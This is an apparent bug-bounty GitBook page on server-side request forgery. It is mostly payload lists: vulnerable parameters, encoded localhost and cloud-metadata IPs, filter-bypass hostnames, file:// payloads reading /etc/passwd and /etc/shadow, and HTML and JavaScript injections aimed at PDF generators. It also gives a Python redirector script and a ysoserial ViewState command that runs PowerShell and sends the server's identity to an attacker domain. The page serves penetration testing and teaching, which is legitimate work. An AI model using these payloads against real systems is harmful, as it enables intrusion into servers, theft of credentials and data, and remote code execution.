SSRF

Server Side Request Forgery: Methodology, payloads, tools

Detection - Vulnerable Parameters

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}
?show={target}
?navigation={target}

SSRF vulnerabilities and where to find themLabs Detectify

GitHub - MindPatch/lorsrf: Fast CLI tool to find the parameters that can be used to find SSRF or Out-of-band resource load :crab:GitHub

Basic payload

http://127.0.0.1

127.0.0.1:80
127.0.0.1:443
127.0.0.1:22
127.1:80
0
0.0.0.0:80
localhost:80
[::]:80/
[::]:25/ SMTP
[::]:3128/ Squid
[0000::1]:80/
[0:0:0:0:0:ffff:127.0.0.1]/thefile
①②⑦.⓪.⓪.⓪
127.127.127.127
127.0.1.3
127.0.0.0
2130706433/
017700000001
3232235521/
3232235777/
0x7f000001/
0xc0a80014/
{domain}@127
.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@127
.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@localhost

localhost#{domain}
{domain}.localhost
localhost/{domain}
localhost/?d={domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}st:+11211aaa
st:00011211aaaa
0/
127.1
127.0.1
1.1.1.1 &@2.2.2.2# @3
.3.3.3/
127.1.1.1:80\\@127
.2.2.2:80/
127.1.1.1:80\\@@127
.2.2.2:80/
127.1.1.1:80:\\@@127
.2.2.2:80/
127.1.1.1:80#\\@127
.2.2.2:80/

Paylod List

payloads/ssrf.txt at main · coffinxp/payloadsGitHub

SSRF to LFI

File Inclusion LFI / RFI

file:/etc/passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/

SSRF POLYGLOT
file:///etc/passwd?/../passwd

Finding SSRF with Burp

Match: https?:\/\/(www\.)?[-a-zA-Z0–9@:%._\+~#=]{1,256}\.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%_\+.~#?&//=]*)

Replace: https://{YOUR_SERVER}/ (Burp Collaborator)

Source: https://x.com/intigriti/status/1848288871735320916?t=bTTpk3N1LoqLpO1768DhQw&s=03

Bug Bounty tip Automating SSRFMedium

Port scan

http://127.0.0.1:§80§

List of common ports

https://gist.githubusercontent.com/sidxparab/45fe9c487a4d7b793b44ac92ec156b36/raw/a3862b37d4671d3446fc27bba4bbbe5667355b09/common-web-ports.txtgist.githubusercontent.com

Filter Bypass

URL Format Bypass - HackTricksbook.hacktricks.xyz

Burp extension

GitHub - hackerassociate/SSRF-Hacks-IP-Decimal: A Burp Suite extension that converts IP addresses to decimal notation, useful for SSRF bypass and WAF evasion testing. Created by Harshad Shah.GitHub

Decimal notation

http://2130706433 equals http://127.0.0.1.

SSRF payloadsMedium

Other notation

127.1 equals 127.0.0.1

GitHub - vysecurity/IPFuscator: IPFuscator - A tool to automatically generate alternative IP representationsGitHub

IPFuscator
Author: Vincent Yiu (@vysecurity)
https://www.github.com/vysec/IPFuscator
Version: 0.1.0

IP Address:     127.0.0.1

Decimal:        2130706433
Hexadecimal:    0x7f000001
Octal:          017700000001

Full Hex:       0x7f.0x0.0x0.0x1
Full Oct:       0177.0.0.01

Random Padding:
Hex:    0x000000000007f.0x000000000000000000000000000000.0x0000.0x0000000000000000000000001
Oct:    00000000000000000000000177.000000000000000000.00000000000000000000000000000.000001

Random base:
#1:     0x7f.0x0.0.01
#2:     0x7f.0x0.0x0.1
#3:     0177.0x0.0x0.0x1
#4:     0x7f.0.0.01
#5:     127.0x0.0.0x1

Random base with random padding:
#1:     127.0x00000000.000000.000000000000000001
#2:     127.0x0000000000000.0x00000000000000000000000000000.0001
#3:     0000000000000000177.0x0000000000000000000000.0x00000000000000000000000000.1
#4:     0000000000000000000177.0.000000.1
#5:     127.0000000000000000000000.0x0000000000000000000.000000000000000000000000000001

GitHub - whiteSHADOW1234/MorphURL: ⚔️ A command-line tool for IP address and URL obfuscation/de-obfuscation, providing diverse techniques for enhanced privacy and security.GitHub

1%32%37.0.0.%31
12%37.%30.%30.%31
%31%327.%30.0.%31
%31%327.%30.%30.1
12%37.0.%30.1
127.%30.%30.%31
1%32%37.0.%30.1
%3127.0.0.%31
%31%32%37.0.%30.%31
1%32%37.%30.0.1
%31%32%37.0.0.%31
%31%32%37.%30.0.%31
%312%37.0.%30.1
%312%37.0.%30.%31
127.0.%30.%31
%31%32%37.0.0.1
1%327.%30.%30.1
%312%37.%30.0.1
%31%32%37.0.%30.1
1%327.%30.0.%31
127.%30.0.%31
%31%327.0.0.%31
127.%30.%30.1
%3127.0.%30.%31
%31%327.%30.%30.%31
1%32%37.%30.%30.1
%3127.%30.%30.1
%31%327.0.%30.1
12%37.%30.0.%31
12%37.%30.%30.1
%312%37.%30.%30.1
1%32%37.0.%30.%31
%31%32%37.%30.0.1
%312%37.0.0.%31
12%37.0.%30.%31
%312%37.%30.0.%31
1%32%37.%30.0.%31
%3127.%30.0.%31
%3127.0.%30.1
%312%37.%30.%30.%31
%31%327.0.%30.%31
1%327.0.%30.%31
1%327.%30.%30.%31

More payload: https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass

IP encoding

Here IP 8.8.4.4 (Google DNS) is used:

8.8.1028 → Partial Decimal (Class B)
Combines the 3rd and 4th octets: 4 × 256 + 4 = 1028

8.525316 → Partial Decimal (Class A)
Combines the last three octets into one decimal number

0x08.8.004.004 → Mixed Encoding
Hexadecimal + Decimal + Octal (segment by segment)

0x08.0x08.004.004 → Double Hex + Octal
Two segments in hex, two in octal

0x08.010.4.4 → Hex + Octal + Decimal Mix

134743044 → Single Decimal
Full 32-bit integer representation of the IP

0x08080404 → Full Hexadecimal IP
Entire IP encoded as a single hex literal

010.010.004.004 → All Octal
Each segment padded with 0 to force octal interpretation

0x8.0x8.0x4.0x4 → Hex per Segment
All four octets encoded individually in hex

8.8.0x404 → Partial Hex (Class B)
Last segment in hex: 0x404 = 1028

Use your own server to redirect on localhost

Just Gopher It: Escalating a Blind SSRF to RCE for $15k — Yahoo MailMedium

redirector.py:

#!/usr/bin/env python3

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2: 
    print("""
Usage: {} <port_number> <url> 
    """.format(sys.argv[0]))
    sys.exit()
    
class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302) 
        self.send_header('Location', sys.argv[2]) 
        self.end_headers() 
    def send_error(self, code, message=None): 
        self.send_response(302) 
        self.send_header('Location', sys.argv[2]) 
        self.end_headers()
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()

Run redirector server:

python3 redirector.py 80 http://127.0.0.1

Vicitim payload: http://[YOUR_IP]

DNS Rebinding

rbndr.us dns rebinding servicelock.cmpxchg8b.com

Also try 127.0.0.1 and 169.254.169.254

Bypassing Filters: SSRF Exploitation via DNS Rebinding with Just 1 in 30 Successful RequestsMedium

Using Wayback And DNS rebinding For SSRFMedium

Server-side Request Forgery (SSRF) via DNS Rebinding AttackSecureLayer7 - Offensive Security, API Scanner & Attack Surface Management

Bypassing Filters: SSRF Exploitation via DNS Rebinding with Just 1 in 30 Successful RequestsMedium

More payloads

Also check Paylaod List

Cloud Metadata IP

169.254.169.254 
169.254.43518 
169.16689662
0xA9.254.0251.0376

New crazy payloads in the URL Validation Bypass Cheat SheetPortSwigger Research

URL / Host Validation Bypass

FreeDNS - Free subdomain AND domain hosting!freedns.afraid.org

https://assets.example.com.attacker.com/

Replace "{CANARY_TOKEN}" with your controlled hostname and replace "example.com" with a whitelisted target host.

.{CANARY_TOKEN}
@{CANARY_TOKEN}
example.com.{CANARY_TOKEN}
example.com@{CANARY_TOKEN}
example.comx.{CANARY_TOKEN}
{CANARY_TOKEN}#example.com
{CANARY_TOKEN}?example.com
{CANARY_TOKEN}#@example.com
{CANARY_TOKEN}?@example.com
127.0.0.1.nip.io
example.com.127.0.0.1.nip.io
127.1
localhost.me

URL validation bypass cheat sheet for SSRF/CORS/Redirect - 2024 Edition | Web Security AcademyWebSecAcademy

Bypassing protocol whitelists

//{CANARY_TOKEN}
\\{CANARY_TOKEN}
////{CANARY_TOKEN}
\\\\{CANARY_TOKEN}
http:{CANARY_TOKEN}
https:{CANARY_TOKEN}
/%00/{CANARY_TOKEN}
/%0A/{CANARY_TOKEN}
/%OD/{CANARY_TOKEN}
/%09/{CANARY_TOKEN}

URL Schemes

file://, dict://, sftp://, ldap://, tftp://, gopher://

Gopher

How Gopher works in escalating SSRFsMedium

GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various serversGitHub

Blind SSRF with OOB

GitHub - assetnote/blind-ssrf-chains: An exhaustive list of all the possible ways you can chain your Blind SSRF vulnerabilityGitHub

Exploit Blind SSRF with OOB Techniques - TCM SecurityTCM Security - Penetration Testing & Consulting

See Use your own server to redirect on localhost

Platform to receive HTTP & DNS callbacks for SSRF (Blind) - interactsh

GitHub - projectdiscovery/interactsh: An OOB interaction gathering server and client libraryGitHub

SSRF (XSS) in PDF Generator

XSS

PDFReacter SSRF to ROOT Level Local File Read which led to RCEMedium

<iframe src="http://localhost/"></iframe>

<iframe src=file:///etc/passwd></iframe>
"/><iframe src="file:///etc/shadow"></iframe>

<!-- Using XHR -->
<script>var x=new XMLHttpRequest();x.onload=(()=>document.write(this.responseText));x.open('GET','http://127.0.0.1');x.send();</script>

<!-- Using Fetch -->
<script>fetch('http://127.0.0.1').then(async r=>document.write(await r.text()))</script>

<!-- Using embed -->
<embed src="http://127.0.0.1" />

<!-- Using base HTML tag -->
<base href="http://127.0.0.1" />

<!-- Loading external stylesheet/script -->
<link rel="stylesheet" src="http://127.0.0.1" />
<script src="http://127.0.0.1"></script>

<!-- Meta-tag to auto-refresh page -->
<meta http-equiv="refresh" content="0; url=http://127.0.0.1/" />

<!-- Loading external image -->
<img src="http://127.0.0.1" />

<!-- Loading external SVG -->
<svg src="http://127.0.0.1" />

<!-- Useful to bypass blacklists -->
<input type="image" src="http://127.0.0.1" />
<video src="http://127.0.0.1" />
<audio src="http://127.0.0.1" />
<audio><source src="http://127.0.0.1"/></audio>

<script>
  var x = new XMLHttpRequest();
  x.onload=function(){ document.write(this.responseText) };
  x.open('GET','http://127.0.0.1'); // You can also read local system files such as "/etc/passwd"
  x.send();
</script>

<script>
  var x = new XMLHttpRequest();
  x.onload=function(){ document.write(this.responseText) };
  x.open("GET","file:///etc/passwd"); x.send();
</script>

Some PDF generators rely on the Chromium web browser without sandbox security enabled and with root privileges. This can often be further escalated to remote code execution!

Hunting for SSRF Bugs in PDF Generators  - Black Hills Information Security, Inc.Black Hills Information Security, Inc.

Exploiting SSRF in PDF HTML Injection: Basic and BlindMedium

Exploiting PDF generators: A complete guide to finding SSRF vulnerabilities in PDF generatorsIntigriti

PDF Generator - SSRF in .NET Application to RCE

How SSRF Leads to RCE in a .NET ApplicationMedium

<html>
<script>
    window.location='file:///C:/Windows/System32/drivers/etc/hosts'
</script>
</html>

Look for encryption keys in web.config

Craft a ViewState payload that executed a PowerShell command to exfiltrate server information

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe -Command \"$w=(whoami); Invoke-WebRequest -Uri http://<attackerdomain>/aaaa?data=$w -UseBasicParsing\"" --path="<path>.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="<decrypt-key>" --validationalg="SHA1" --validationkey="<key>"

NextJS apps

Next.js / React

CVE-2024-34351 - fixed in v14.1.1.

https://example.com/_next/image?url=https://localhost:2345/api/v1/x&w=256&q=75

https://example.com/_next/image?url=https://third-party.com/logout%3furl%3Dhttps%3A%2F%2Flocalhost%3A2345%2Fapi%2Fv1%2Fx&w=256&q=75

Digging for SSRF in NextJS appswww.assetnote.io

Tools

SSRFmap

GitHub - swisskyrepo/SSRFmap: Automatic SSRF fuzzer and exploitation toolGitHub

Autossrf

GitHub - Th0h0/autossrf: Smart context-based SSRF vulnerability scanner.GitHub

0dSSRF

GitHub - KariiemGamal/0dSSRF: a powerful tool designed to automate the detection of Server-Side Request Forgery (SSRF) and Open Redirect vulnerabilitiesGitHub

SSRFPwned

GitHub - blackhatethicalhacking/SSRFPwned: Checks for SSRF using built-in custom Payloads after fetching URLs from Multiple Passive Sources & applying complex patterns aimed at SSRFGitHub

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more

• Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them

• Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

Resources

Bug-Bounty-Methodology/Server Side Request Forgery.md at main · trilokdhaked/Bug-Bounty-MethodologyGitHub

SSRF: Advanced Exploitation GuideIntigriti

How To: Server-Side Request Forgery (SSRF) | HackerOneHackerOne

SSRF Cheat Sheet & Bypass Techniqueshighon.coffee

A10 Falsification de requête côté serveur (SSRF) - OWASP Top 10:2021owasp.org

What is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security AcademyWebSecAcademy

Server-Side Request Forgery (SSRF) | Common Attacks & Risks | ImpervaLearning Center

Server Side Request Forgery Prevention - OWASP Cheat Sheet Seriescheatsheetseries.owasp.org

SSRF Attacks Explained: How They Work & How to PreventIntigriti

I Studied 100+ SSRF Reports, and Here’s What I LearnedMedium